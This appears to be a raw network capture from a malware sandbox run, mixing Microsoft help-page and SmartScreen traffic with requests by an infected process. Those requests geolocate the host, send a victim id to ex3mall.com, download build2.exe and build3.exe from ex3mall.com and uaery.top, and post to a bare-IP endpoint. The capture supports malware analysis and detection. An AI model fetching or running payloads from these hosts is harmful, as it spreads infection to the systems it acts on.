referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: ARRAffinity=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ARRAffinitySameSite=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448752928
if-none-match: "0x8DAE48DCC103B02"
if-modified-since: Fri, 23 Dec 2022 02:31:29 GMT
ResponseHTTP/2.0 304
last-modified: Thu, 03 Nov 2022 17:50:35 GMT
etag: "0x8DABDC3E90AE3AD"
cache-control: public, max-age=581
expires: Sat, 31 Dec 2022 00:15:38 GMT
date: Sat, 31 Dec 2022 00:05:57 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.pngmsedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: ARRAffinity=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ARRAffinitySameSite=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448752928
if-none-match: "0x8D8E3CB33C8B874"
if-modified-since: Wed, 10 Mar 2021 13:48:35 GMT
ResponseHTTP/2.0 304
last-modified: Fri, 23 Dec 2022 02:31:29 GMT
etag: "0x8DAE48DCC103B02"
cache-control: public, max-age=541
expires: Sat, 31 Dec 2022 00:14:58 GMT
date: Sat, 31 Dec 2022 00:05:57 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.pngmsedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: ARRAffinity=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ARRAffinitySameSite=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448752928
if-none-match: "0x8D8E3CB3429357A"
if-modified-since: Wed, 10 Mar 2021 13:48:36 GMT
ResponseHTTP/2.0 304
last-modified: Wed, 10 Mar 2021 13:48:35 GMT
etag: "0x8D8E3CB33C8B874"
cache-control: public, max-age=1774
expires: Sat, 31 Dec 2022 00:35:31 GMT
date: Sat, 31 Dec 2022 00:05:57 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.pngmsedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/media/application-not-started/install-3-5.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: ARRAffinity=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ARRAffinitySameSite=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448752928
if-none-match: "0x8D8E3CB2E2E71C7"
if-modified-since: Wed, 10 Mar 2021 13:48:26 GMT
ResponseHTTP/2.0 304
last-modified: Wed, 10 Mar 2021 13:48:36 GMT
etag: "0x8D8E3CB3429357A"
cache-control: public, max-age=1732
expires: Sat, 31 Dec 2022 00:34:49 GMT
date: Sat, 31 Dec 2022 00:05:57 GMT
akamai-cache-status: Hit from child
-
Remote address:20.86.249.62:443RequestPOST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiK3ZjRzZuQ25rZmc9Iiwia2V5IjoiYzd2VFY0bUtzMVh3WlRCdEd3T21IZz09In0=
User-Agent: SmartScreen/281479409565696
Content-Length: 2056
Host: nav.smartscreen.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Length: 1007
Content-Type: application/json; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
X-SmartScreen-Flight-Vector: EnableNsHumorMatch,enableProxyLeniency,IsArsFmsIntegrationEnabled,IsCurfId0LoggingEnabled,isCurfTstEnabled,isNpPIOverrideBlockEnabled,ListApiE5V2Enabled,npSettings2004,SendGeoMapInSettingsToNewAnaheimClient,SrcEOPEnabled,topTrafficV2Enabled,UpdateOnMissingEtagEnabled,updateSigningCert,updateSigningCertForRS3RS4
Date: Sat, 31 Dec 2022 00:05:35 GMT
Connection: close
-
Remote address:20.86.249.62:443RequestPOST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoieVNTdEdkWHdyUG89Iiwia2V5IjoiY2xTWnB2NlkvTkZldXgxV3RMSWdyQT09In0=
User-Agent: SmartScreen/281479409565696
Content-Length: 2240
Host: nav.smartscreen.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Length: 1015
Content-Type: application/json; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
X-SmartScreen-Flight-Vector: EnableNsHumorMatch,enableProxyLeniency,IsArsFmsIntegrationEnabled,IsCurfId0LoggingEnabled,isCurfTstEnabled,isNpPIOverrideBlockEnabled,ListApiE5V2Enabled,npSettings2004,SendGeoMapInSettingsToNewAnaheimClient,SrcEOPEnabled,topTrafficV2Enabled,UpdateOnMissingEtagEnabled,updateSigningCert,updateSigningCertForRS3RS4
Date: Sat, 31 Dec 2022 00:05:35 GMT
Connection: close
-
Remote address:20.86.249.62:443RequestPOST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiYlZkbFN5eHV6N3M9Iiwia2V5IjoiRTROY28vWWE5VVpMUG1OUmd0WXlmZz09In0=
User-Agent: SmartScreen/281479409565696
Content-Length: 2056
Host: nav.smartscreen.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Length: 1007
Content-Type: application/json; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
X-SmartScreen-Flight-Vector: EnableNsHumorMatch,enableProxyLeniency,IsArsFmsIntegrationEnabled,IsCurfId0LoggingEnabled,isCurfTstEnabled,isNpPIOverrideBlockEnabled,ListApiE5V2Enabled,npSettings2004,SendGeoMapInSettingsToNewAnaheimClient,SrcEOPEnabled,topTrafficV2Enabled,UpdateOnMissingEtagEnabled,updateSigningCert,updateSigningCertForRS3RS4
Date: Sat, 31 Dec 2022 00:05:36 GMT
Connection: close
-
Remote address:162.0.217.254:443RequestGET /geo.json HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: api.2ip.ua
ResponseHTTP/1.1 429 Too Many Requests
Server: Apache
Strict-Transport-Security: max-age=63072000; preload
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block; report=...
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
Upgrade: h2,h2c
Connection: Upgrade
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Requestwcpstatic.microsoft.comIN AResponsewcpstatic.microsoft.comIN CNAMEconsentdeliveryfd.azurefd.netconsentdeliveryfd.azurefd.netIN CNAMEfirstparty-azurefd-prod.trafficmanager.netfirstparty-azurefd-prod.trafficmanager.netIN CNAMEshed.dual-low.part-0039.t-0009.fdv2-t-msedge.netshed.dual-low.part-0039.t-0009.fdv2-t-msedge.netIN CNAMEpart-0039.t-0009.fdv2-t-msedge.netpart-0039.t-0009.fdv2-t-msedge.netIN A13.107.237.67part-0039.t-0009.fdv2-t-msedge.netIN A13.107.238.67
-
Remote address:8.8.8.8:53Requestjs.monitor.azure.comIN AResponsejs.monitor.azure.comIN CNAMEaijscdn2.azureedge.netaijscdn2.azureedge.netIN CNAMEaijscdn2.afd.azureedge.netaijscdn2.afd.azureedge.netIN CNAMEfirstparty-azurefd-prod.trafficmanager.netfirstparty-azurefd-prod.trafficmanager.netIN CNAMEshed.dual-low.part-0039.t-0009.fdv2-t-msedge.netshed.dual-low.part-0039.t-0009.fdv2-t-msedge.netIN CNAMEpart-0039.t-0009.fdv2-t-msedge.netpart-0039.t-0009.fdv2-t-msedge.netIN A13.107.237.67part-0039.t-0009.fdv2-t-msedge.netIN A13.107.238.67
-
Remote address:8.8.8.8:53Requestex3mall.comIN AResponseex3mall.comIN A211.119.84.112ex3mall.comIN A58.235.189.192ex3mall.comIN A190.140.74.43ex3mall.comIN A211.53.230.67ex3mall.comIN A211.59.14.90ex3mall.comIN A201.124.230.1ex3mall.comIN A109.98.58.98ex3mall.comIN A190.117.75.91ex3mall.comIN A200.46.66.71ex3mall.comIN A175.119.10.231
-
Remote address:8.8.8.8:53Requestuaery.topIN AResponseuaery.topIN A203.91.116.53uaery.topIN A190.140.74.43uaery.topIN A190.117.75.91uaery.topIN A222.236.49.124uaery.topIN A222.236.49.123uaery.topIN A211.119.84.112uaery.topIN A175.120.254.9uaery.topIN A187.156.18.69uaery.topIN A181.94.48.228uaery.topIN A201.124.230.1
-
Remote address:211.119.84.112:80RequestGET /lancer/get.php?pid=D399FB9CECE73F192FF02F88D7A801FA&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: ex3mall.com
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.37 (Win64) PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 563
Connection: close
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Requestmdec.nelreports.netIN AResponsemdec.nelreports.netIN CNAMEmdec.nelreports.net.akamaized.netmdec.nelreports.net.akamaized.netIN CNAMEa1883.dscd.akamai.neta1883.dscd.akamai.netIN A84.53.175.81a1883.dscd.akamai.netIN A84.53.175.67
-
Remote address:203.91.116.53:80RequestGET /dl/build2.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: uaery.top
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
Last-Modified: Thu, 29 Dec 2022 16:33:34 GMT
ETag: "65e00-5f0fa0bd6500e"
Accept-Ranges: bytes
Content-Length: 417280
Connection: close
Content-Type: application/octet-stream
-
Remote address:84.53.175.81:443RequestOPTIONS /api/report?cat=mdocs HTTP/1.1
Host: mdec.nelreports.net
Connection: keep-alive
Origin: https://learn.microsoft.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Access-Control-Allow-Headers: content-type
Date: Sat, 31 Dec 2022 00:05:38 GMT
Connection: keep-alive
Access-Control-Allow-Credentials: false
Access-Control-Allow-Methods: *
Access-Control-Allow-Methods: GET, OPTIONS, POST
Access-Control-Allow-Origin: *
-
Remote address:84.53.175.81:443RequestPOST /api/report?cat=mdocs HTTP/1.1
Host: mdec.nelreports.net
Connection: keep-alive
Content-Length: 639
Content-Type: application/reports+json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Sat, 31 Dec 2022 00:05:38 GMT
Connection: keep-alive
Access-Control-Allow-Credentials: false
Access-Control-Allow-Methods: *
Access-Control-Allow-Methods: GET, OPTIONS, POST
Access-Control-Allow-Origin: *
-
Remote address:8.8.8.8:53Requestdns.googleIN AResponsedns.googleIN A8.8.4.4dns.googleIN A8.8.8.8
-
GEThttps://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmsedge.exeRemote address:8.8.4.4:443RequestGET /dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/2.0
host: dns.google
accept: application/dns-message
accept-language: *
user-agent: Chrome
accept-encoding: identity
-
GEThttps://dns.google/dns-query?dns=AAABAAABAAAAAAABBWxlYXJuCW1pY3Jvc29mdANjb20AAAEAAQAAKRAAAAAAAABQAAwATAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmsedge.exeRemote address:8.8.4.4:443RequestGET /dns-query?dns=AAABAAABAAAAAAABBWxlYXJuCW1pY3Jvc29mdANjb20AAAEAAQAAKRAAAAAAAABQAAwATAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/2.0
host: dns.google
accept: application/dns-message
accept-language: *
user-agent: Chrome
accept-encoding: identity
-
GEThttps://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmsedge.exeRemote address:8.8.4.4:443RequestGET /dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/2.0
host: dns.google
accept: application/dns-message
accept-language: *
user-agent: Chrome
accept-encoding: identity
-
GEThttps://dns.google/dns-query?dns=AAABAAABAAAAAAABBGVkZ2UJbWljcm9zb2Z0A2NvbQAAAQABAAApEAAAAAAAAFEADABNAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmsedge.exeRemote address:8.8.4.4:443RequestGET /dns-query?dns=AAABAAABAAAAAAABBGVkZ2UJbWljcm9zb2Z0A2NvbQAAAQABAAApEAAAAAAAAFEADABNAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/2.0
host: dns.google
accept: application/dns-message
accept-language: *
user-agent: Chrome
accept-encoding: identity
-
POSThttps://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batchmsedge.exeRemote address:104.73.152.149:443RequestPOST /api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch HTTP/2.0
host: learn.microsoft.com
content-length: 66
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-encoding: gzip
vary: Origin,Accept-Encoding
access-control-allow-origin: https://learn.microsoft.com
request-context: appId=cid-v1:8da7faac-355b-4ce1-beec-f624ec5c6263
x-ms-operation-id: 1f20e23ac05a4efda980d432367e0bff
x-content-type-options: nosniff
x-powered-by: ASP.NET
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 003yvYwAAAADu9aJ8LcWYRKOUwV4a3T9URFVTMzBFREdFMDYyMAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 1010
cache-control: public, max-age=43164
expires: Sat, 31 Dec 2022 12:05:03 GMT
date: Sat, 31 Dec 2022 00:05:39 GMT
set-cookie: ARRAffinity=6beabb3c684f6be1e88a3c21db05de0bfb0875e9d10b9b86de83c8e8f62f496f;Path=/;HttpOnly;Secure;Domain=docsrecoapi-public-eus.azurewebsites.net
set-cookie: ARRAffinitySameSite=6beabb3c684f6be1e88a3c21db05de0bfb0875e9d10b9b86de83c8e8f62f496f;Path=/;HttpOnly;SameSite=None;Secure;Domain=docsrecoapi-public-eus.azurewebsites.net
akamai-cache-status: Miss from child, Miss from parent
-
POSThttps://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batchmsedge.exeRemote address:104.73.152.149:443RequestPOST /api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch HTTP/2.0
host: learn.microsoft.com
content-length: 66
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-encoding: gzip
vary: Origin,Accept-Encoding
access-control-allow-origin: https://learn.microsoft.com
request-context: appId=cid-v1:8da7faac-355b-4ce1-beec-f624ec5c6263
x-ms-operation-id: b46d098cafa67488f739bf9eda9ec5b8
x-content-type-options: nosniff
x-powered-by: ASP.NET
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 023yvYwAAAABb6lilIoT2S7DeoVK/NJLSRFVTMzBFREdFMDYxNwA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 1010
cache-control: public, max-age=43200
expires: Sat, 31 Dec 2022 12:05:47 GMT
date: Sat, 31 Dec 2022 00:05:47 GMT
set-cookie: ARRAffinity=1c0193b77351a477acd461ae6142a38b27cce09c92040e11b10856c946e0563e;Path=/;HttpOnly;Secure;Domain=docsrecoapi-public-eus.azurewebsites.net
set-cookie: ARRAffinitySameSite=1c0193b77351a477acd461ae6142a38b27cce09c92040e11b10856c946e0563e;Path=/;HttpOnly;SameSite=None;Secure;Domain=docsrecoapi-public-eus.azurewebsites.net
akamai-cache-status: Miss from child, Miss from parent
-
POSThttps://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batchmsedge.exeRemote address:104.73.152.149:443RequestPOST /api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch HTTP/2.0
host: learn.microsoft.com
content-length: 66
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-encoding: gzip
vary: Origin,Accept-Encoding
access-control-allow-origin: https://learn.microsoft.com
request-context: appId=cid-v1:8da7faac-355b-4ce1-beec-f624ec5c6263
x-ms-operation-id: d7b419fb1353633b104bb0d702d316a7
x-content-type-options: nosniff
x-powered-by: ASP.NET
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 04XyvYwAAAAAW5XrMQpPHQp5NtuJzIXugRFVTMzBFREdFMDYyMAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 1010
cache-control: public, max-age=43200
expires: Sat, 31 Dec 2022 12:05:53 GMT
date: Sat, 31 Dec 2022 00:05:53 GMT
set-cookie: ARRAffinity=b6a0c48caf7e3653076d47143e4bb15042836dc33f125d6237c782bae3796122;Path=/;HttpOnly;Secure;Domain=docsrecoapi-public-eus.azurewebsites.net
set-cookie: ARRAffinitySameSite=b6a0c48caf7e3653076d47143e4bb15042836dc33f125d6237c782bae3796122;Path=/;HttpOnly;SameSite=None;Secure;Domain=docsrecoapi-public-eus.azurewebsites.net
akamai-cache-status: Miss from child, Miss from parent
-
POSThttps://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batchmsedge.exeRemote address:104.73.152.149:443RequestPOST /api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch HTTP/2.0
host: learn.microsoft.com
content-length: 66
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-encoding: gzip
vary: Origin,Accept-Encoding
access-control-allow-origin: https://learn.microsoft.com
request-context: appId=cid-v1:8da7faac-355b-4ce1-beec-f624ec5c6263
x-ms-operation-id: 4cef6d8fd39312b54c7b26fb335344eb
x-content-type-options: nosniff
x-powered-by: ASP.NET
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 05nyvYwAAAADa5xO+gZXbTpMTd0LlTHM6RFVTMzBFREdFMDYxNwA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 1010
cache-control: public, max-age=43178
expires: Sat, 31 Dec 2022 12:05:36 GMT
date: Sat, 31 Dec 2022 00:05:58 GMT
set-cookie: ARRAffinity=8da9fd8a58307db44c5e2537763b485cda47aafbc0e99fdead97c7a9c647728f;Path=/;HttpOnly;Secure;Domain=docsrecoapi-public-eus.azurewebsites.net
set-cookie: ARRAffinitySameSite=8da9fd8a58307db44c5e2537763b485cda47aafbc0e99fdead97c7a9c647728f;Path=/;HttpOnly;SameSite=None;Secure;Domain=docsrecoapi-public-eus.azurewebsites.net
akamai-cache-status: Miss from child, Miss from parent
-
Remote address:211.119.84.112:80RequestGET /files/1/build3.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: ex3mall.com
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.37 (Win64) PHP/5.6.40
Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT
ETag: "2600-5c86757379380"
Accept-Ranges: bytes
Content-Length: 9728
Connection: close
Content-Type: application/x-msdownload
-
Remote address:62.204.41.91:80RequestPOST /8kcnjd3da3/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.91
Content-Length: 89
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
